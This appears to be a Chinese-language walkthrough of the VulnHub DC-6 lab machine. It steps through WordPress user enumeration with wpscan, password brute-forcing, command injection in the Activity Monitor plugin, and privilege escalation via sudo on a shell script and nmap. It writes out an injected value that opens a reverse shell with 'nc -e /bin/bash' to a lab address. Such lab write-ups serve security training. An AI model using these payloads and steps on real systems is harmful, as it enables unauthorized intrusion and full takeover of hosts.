vulnhub - DC 6

扫描开启的服务:开启了22、80端口
vulnhub - DC 6_第1张图片

目录遍历

vulnhub - DC 6_第2张图片

查看80端口,发现是一个WordPress客框架

使用wpscan进行用户枚举

wpscan --url http://wordy --enumerate u 发现有五个用户

vulnhub - DC 6_第3张图片

没有思路,在dc-6下载的官网有提示

vulnhub - DC 6_第4张图片

根据提示生成密码字典

把五个用户写在一个文本,使用密码字典依次爆破

有一个mark用户 helpdesk01

vulnhub - DC 6_第5张图片
在后台进行登录
vulnhub - DC 6_第6张图片

这里有一个插件activity monitor;他有一个远程命令执行漏洞

vulnhub - DC 6_第7张图片

Tools 这里有一个提交Lookup

vulnhub - DC 6_第8张图片

抓包验证

vulnhub - DC 6_第9张图片

命令输入执行nc监听

127.0.0.9 | nc -e /bin/bash 192.168.56.133 4444
vulnhub - DC 6_第10张图片

查看home目录

Mark/stuff目录下面有一个文件

vulnhub - DC 6_第11张图片

Graham是前面爆出来的用户;

22端口是开启的,可以尝试ssh连接
vulnhub - DC 6_第12张图片

进行尝试提权

sudo -l 查看当前用户的执行权限

vulnhub - DC 6_第13张图片

jens/下面的backups.sh是一个可执行shell文件

在里面写上一个/bin/bash并执行,实行水平越权;可以拿到一个shell

Sudo -u jens ./backups.sh

vulnhub - DC 6_第14张图片

sudo -l 查看当前用户的执行权限

有一个nmap执行文件,是以root权限执行的

写一个nmap脚本,在执行脚本文件的时候,实现水平越权
vulnhub - DC 6_第15张图片

成功
vulnhub - DC 6_第16张图片

你可能感兴趣的:(渗透测试)